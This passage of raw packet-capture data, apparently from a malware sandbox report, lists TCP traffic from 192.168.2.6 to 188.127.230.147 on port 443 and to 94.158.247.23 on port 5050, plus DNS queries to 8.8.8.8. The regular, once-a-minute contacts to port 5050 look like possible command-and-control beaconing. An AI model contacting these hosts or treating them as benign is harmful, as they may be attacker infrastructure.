                                                          Aug 2, 2023 10:16:22.333929062 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.333941936 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.333977938 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.333985090 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334018946 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334026098 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334057093 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334064960 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334083080 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334098101 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334106922 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334147930 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334176064 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334182978 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334198952 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334228992 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334270000 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334508896 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334542990 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334594011 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334611893 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334633112 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334657907 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334676027 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334702969 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334748983 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334759951 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334794998 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334810972 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334822893 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334857941 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334903955 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334916115 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334958076 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334969044 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.334986925 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.334992886 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.335016012 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.335036993 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.335099936 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.335110903 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.335159063 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.335306883 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.335344076 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.335395098 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.335412025 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.335447073 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.335479975 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.335649014 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.336011887 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.336049080 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.336105108 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.336124897 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.336158991 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.336179018 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.336599112 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.337203979 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.337246895 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.337301970 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.337322950 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.337347984 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.337362051 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.337377071 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.337409973 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.337420940 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.337451935 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.337492943 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.337960005 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.337996006 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.338057995 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.338078022 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.338099003 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.338133097 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339092970 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339128971 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339205027 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339219093 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339235067 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339256048 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339268923 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339301109 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339318037 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339349031 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339368105 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339381933 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339394093 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339415073 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339458942 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339471102 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339505911 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339509010 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339544058 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339550972 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339577913 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339602947 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339637041 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.339651108 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339684010 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:22.339735031 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.359327078 CEST49707443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:22.359360933 CEST44349707188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.091403961 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.091465950 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.091619968 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.116066933 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.116107941 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.299273014 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.299509048 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.302587986 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.302618980 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.303214073 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.310507059 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.350825071 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.515327930 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.515368938 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.515400887 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.515657902 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.515697002 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.515721083 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.516072989 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.576843977 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.576889038 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.577013969 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.577061892 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.577095032 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.577095032 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.577122927 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.577152967 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.613461018 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.613487959 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.613725901 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.613754034 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635087967 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635138988 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635250092 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635272026 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635509968 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635509014 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.635550976 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635585070 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635597944 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.635715961 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.635757923 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.636235952 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.636269093 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.636445045 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.636445045 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.636445045 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.636445045 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.636445045 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.636445045 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.636476994 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.683264017 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.699851036 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.699884892 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.699970007 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.700017929 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.700020075 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.700054884 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.700083971 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.700197935 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.745639086 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.980758905 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.980791092 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.980864048 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.980911016 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.980969906 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.980986118 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.980993032 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981005907 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981091976 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981102943 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981102943 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981117010 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981132030 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981161118 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981216908 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981234074 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981295109 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981296062 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981301069 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981312990 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981343031 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981384993 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981384993 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981405020 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981425047 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981441975 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981456041 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981456041 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981456041 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981475115 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981523037 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981524944 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981550932 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981621981 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981621981 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981621981 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981623888 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981637001 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981664896 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981707096 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981709957 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981751919 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981796026 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981812954 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981816053 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981816053 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981831074 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981856108 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981861115 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981882095 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.981935024 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981970072 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.981980085 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:23.982038021 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.982038021 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:23.982126951 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.047622919 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.047669888 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.047739983 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.047786951 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.047811985 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.047836065 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.047928095 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.047960043 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.048042059 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.089497089 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.105767012 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.105820894 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.105956078 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.105994940 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.105994940 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106010914 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106044054 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106100082 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106100082 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106106043 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106138945 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106230021 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106251001 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106251001 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106266022 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106286049 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106374979 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106374979 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106374979 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106395006 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106424093 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106527090 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106527090 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106533051 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106553078 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106585026 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106591940 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106662989 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106664896 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106664896 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106678963 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106707096 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106762886 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106762886 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106775999 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.106853962 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.106853962 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.107395887 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.167105913 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.167160034 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.167340994 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.167367935 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.167783022 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.167783976 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.167932987 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.167994022 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.168066978 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:24.168174028 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.168174028 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.168174028 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.200177908 CEST49708443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:24.200231075 CEST44349708188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.060421944 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.060487032 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.060599089 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.127440929 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.127475977 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.256279945 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.256438971 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.259167910 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.259207964 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.259711981 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.266282082 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.310816050 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.367456913 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.367573023 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:25.367641926 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.386096001 CEST49709443192.168.2.6188.127.230.147
                                                          Aug 2, 2023 10:16:25.386154890 CEST44349709188.127.230.147192.168.2.6
                                                          Aug 2, 2023 10:16:35.299082994 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:16:35.471350908 CEST50504971094.158.247.23192.168.2.6
                                                          Aug 2, 2023 10:16:35.471431017 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:16:36.147886038 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:16:36.321623087 CEST50504971094.158.247.23192.168.2.6
                                                          Aug 2, 2023 10:16:36.363677979 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:16:36.788955927 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:16:36.961810112 CEST50504971094.158.247.23192.168.2.6
                                                          Aug 2, 2023 10:16:37.062714100 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:16:37.097242117 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:16:37.333789110 CEST50504971094.158.247.23192.168.2.6
                                                          Aug 2, 2023 10:16:39.138272047 CEST4971180192.168.2.651.142.119.24
                                                          Aug 2, 2023 10:16:39.168524981 CEST804971151.142.119.24192.168.2.6
                                                          Aug 2, 2023 10:16:39.168620110 CEST4971180192.168.2.651.142.119.24
                                                          Aug 2, 2023 10:16:39.272135973 CEST4971180192.168.2.651.142.119.24
                                                          Aug 2, 2023 10:16:39.342803001 CEST804971151.142.119.24192.168.2.6
                                                          Aug 2, 2023 10:16:39.398652077 CEST804971151.142.119.24192.168.2.6
                                                          Aug 2, 2023 10:16:39.398740053 CEST4971180192.168.2.651.142.119.24
                                                          Aug 2, 2023 10:17:37.295517921 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:17:37.521034002 CEST50504971094.158.247.23192.168.2.6
                                                          Aug 2, 2023 10:18:25.647130013 CEST4971180192.168.2.651.142.119.24
                                                          Aug 2, 2023 10:18:25.677145958 CEST804971151.142.119.24192.168.2.6
                                                          Aug 2, 2023 10:18:25.681360006 CEST4971180192.168.2.651.142.119.24
                                                          Aug 2, 2023 10:18:37.476180077 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:18:37.708879948 CEST50504971094.158.247.23192.168.2.6
                                                          Aug 2, 2023 10:19:37.575835943 CEST497105050192.168.2.694.158.247.23
                                                          Aug 2, 2023 10:19:37.803927898 CEST50504971094.158.247.23192.168.2.6

                                                          UDP Packets

                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Aug 2, 2023 10:16:17.568207026 CEST4944853192.168.2.68.8.8.8
                                                          Aug 2, 2023 10:16:17.709898949 CEST53494488.8.8.8192.168.2.6
                                                          Aug 2, 2023 10:16:19.943656921 CEST5908253192.168.2.68.8.8.8
                                                          Aug 2, 2023 10:16:20.014754057 CEST53590828.8.8.8192.168.2.6
                                                          Aug 2, 2023 10:16:21.562964916 CEST5950453192.168.2.68.8.8.8
                                                          Aug 2, 2023 10:16:21.591770887 CEST53595048.8.8.8192.168.2.6
                                                          Aug 2, 2023 10:16:23.040771961 CEST6519853192.168.2.68.8.8.8
                                                          Aug 2, 2023 10:16:23.070672989 CEST53651988.8.8.8192.168.2.6
                                                          Aug 2, 2023 10:16:24.943399906 CEST6291053192.168.2.68.8.8.8
